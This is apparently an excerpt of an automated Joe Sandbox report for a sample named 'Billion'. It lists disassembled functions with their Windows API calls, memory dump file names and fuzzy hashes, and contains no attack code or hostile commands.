                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                          • Opcode ID: e6f59b5f0576f33b3e29370db316ae6f7a0f0599e4bcc7d0e3f40b4acf34c277
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0930aed564a7dd54358e8a37ff76f34256d46ea28e052e1c290b4992d93bf865
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f59b5f0576f33b3e29370db316ae6f7a0f0599e4bcc7d0e3f40b4acf34c277
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE21817950030AAFDB318F65DC04A9ABBE8BF5A720F204A69FCA5E72D0D771D841DB50
                                                                                                                                                                                                                                                                                                          Function 001A0F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 001A0F6D
                                                                                                                                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001A0FA8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                          • Opcode ID: 06c050437d8bdf6df793ed9045ece410ee83bee23a87abd651a485a3d3a1c169
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9030f79aaff0e44bc4b5b0c2ab89b599431495f6b667f856d09e15f62fe293ec
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c050437d8bdf6df793ed9045ece410ee83bee23a87abd651a485a3d3a1c169
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B21A179500345EFDB309F689D04A9ABBE8BF5A720F200A19F9A1E32D0D770D981DB50
                                                                                                                                                                                                                                                                                                          Function 001C4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001378B1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: GetStockObject.GDI32(00000011), ref: 001378C5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001378CF
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001C4BB0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001C4BBD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001C4BC8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001C4BD7
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001C4BE3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                          • Opcode ID: 140cc2d1547ba4a5bff702334875e594d5560001f1494900f711422ec52bce52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bb376a3c0ba6d299d96b626567ae2bf92bdaf68b3043269692493539752d2ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 140cc2d1547ba4a5bff702334875e594d5560001f1494900f711422ec52bce52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E1181B5150219BEEF118E64CC85FEB7F6DEF18758F014111B608A2090CB72DC219BA0
                                                                                                                                                                                                                                                                                                          Function 0016DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0016DB23: _free.LIBCMT ref: 0016DB4C
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DBAD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4), ref: 00162D4E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00162D38: GetLastError.KERNEL32(00201DC4,?,0016DB51,00201DC4,00000000,00201DC4,00000000,?,0016DB78,00201DC4,00000007,00201DC4,?,0016DF75,00201DC4,00201DC4), ref: 00162D60
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DBB8
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DBC3
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC17
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC22
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC2D
                                                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0016DC38
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b5ffa96e3ce2b022efa3797f90345f50bfc9c83b205965322771e1b81beb38b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B113072A41B04BAD620BBB0DC07FDB77DCAF26700F418C19B299EA252DB75B5248750
                                                                                                                                                                                                                                                                                                          Function 0019E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0019E328
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0019E32F
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0019E345
                                                                                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000), ref: 0019E34C
                                                                                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0019E390
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0019E36D
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0a144883010202b11602dcc4a86a180cb652210596485dfe37618888b16b4893
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8df11c9e09cb616e2a9ce4ecb6366a1d5cf2e2d8c751b2cb58dfaf04e9dd3330
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a144883010202b11602dcc4a86a180cb652210596485dfe37618888b16b4893
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA01A2F29002087FE71097A4DD89EEA7B6CDB08300F4041A1B705E2441E770DE848B75
                                                                                                                                                                                                                                                                                                          Function 001A1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 001A1322
                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 001A1334
                                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 001A1342
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001A1350
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 001A135F
                                                                                                                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 001A136F
                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 001A1376
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b5706406017846687e4e0855b56ba4f77035d4420923e6cd4a67cc4417ec626
                                                                                                                                                                                                                                                                                                          • Instruction ID: a43795d59e2ecceaca8f3c96ea8b34707a050eb0ac3ec28c9b52780c62411886
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b5706406017846687e4e0855b56ba4f77035d4420923e6cd4a67cc4417ec626
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92F0C972042612BBD7415F54EE49FD6BF39FF05312F402121F10291CA08774D4A2CF90
                                                                                                                                                                                                                                                                                                          Function 001B26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 001B281D
                                                                                                                                                                                                                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001B283E
                                                                                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001B284F
                                                                                                                                                                                                                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 001B2938
                                                                                                                                                                                                                                                                                                          • inet_ntoa.WSOCK32(?), ref: 001B28E9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019433E: _strlen.LIBCMT ref: 00194348
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,001AF669), ref: 001B3C9D
                                                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 001B2992
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 714bd144e7d5707e0c9ed8890c9d1d06255ac87cfbb68164be02467a4f67c581
                                                                                                                                                                                                                                                                                                          • Instruction ID: 09af0e2de02044fa4a729f6beaa6a92da3371e10a519b76546a53469bb087e09
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 714bd144e7d5707e0c9ed8890c9d1d06255ac87cfbb68164be02467a4f67c581
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADB1D171604300AFD324DF24C885F6ABBE5AFA4318F54855CF45A4F2A2DB31ED4ACB91
                                                                                                                                                                                                                                                                                                          Function 00160527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 0016042A
                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00160446
                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 0016045D
                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0016047B
                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 00160492
                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001604B0
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                          • Instruction ID: bbec9b7e6d826fc2e5bdd498ab6e91578e16bf590dca2aaaffbef500d7f93fce
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7481E5726007069FE726AE68CC81B6B73B9EF68325F24452EF511DB2C1EB70D9218790
                                                                                                                                                                                                                                                                                                          Function 00166571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00158649,00158649,?,?,?,001667C2,00000001,00000001,8BE85006), ref: 001665CB
                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,001667C2,00000001,00000001,8BE85006,?,?,?), ref: 00166651
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0016674B
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00166758
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00163B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00156A79,?,0000015D,?,?,?,?,001585B0,000000FF,00000000,?,?), ref: 00163BC5
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00166761
                                                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00166786
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f107dc5169bebf832d637bc7b7f7b8673e1094ffa8bf3d315189afc0c361b900
                                                                                                                                                                                                                                                                                                          • Instruction ID: ec501c569d9e8241d484ed7e6a43d5ee156ba205fcd38ef5685f1c3e15c50d3c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f107dc5169bebf832d637bc7b7f7b8673e1094ffa8bf3d315189afc0c361b900
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1451467260025AAFEB258F64CC85EBF7BAAEF50754F154269FC18D7140EB34EC60C6A0
                                                                                                                                                                                                                                                                                                          Function 001BC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001BC10E,?,?), ref: 001BD415
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD451
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4C8
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001BD3F8: _wcslen.LIBCMT ref: 001BD4FE
                                                                                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001BC72A
                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001BC785
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001BC7CA
                                                                                                                                                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001BC7F9
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001BC853
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 001BC85F
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: b97cdc0d9fa76e12d22cea315bd7fe59779fb6118d7413a841dd303becd92d52
                                                                                                                                                                                                                                                                                                          • Instruction ID: 753eb8dc9a99f16524f80f468309822c21947939e3a099541dabbb4adbabe095
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b97cdc0d9fa76e12d22cea315bd7fe59779fb6118d7413a841dd303becd92d52
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59818D71208241EFC714DF64C885E6ABBE5FF94308F1485ACF5598B2A2DB31ED45CB92
                                                                                                                                                                                                                                                                                                          Function 0019009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(00000035), ref: 001900A9
                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00190150
                                                                                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(00190354,00000000), ref: 00190179
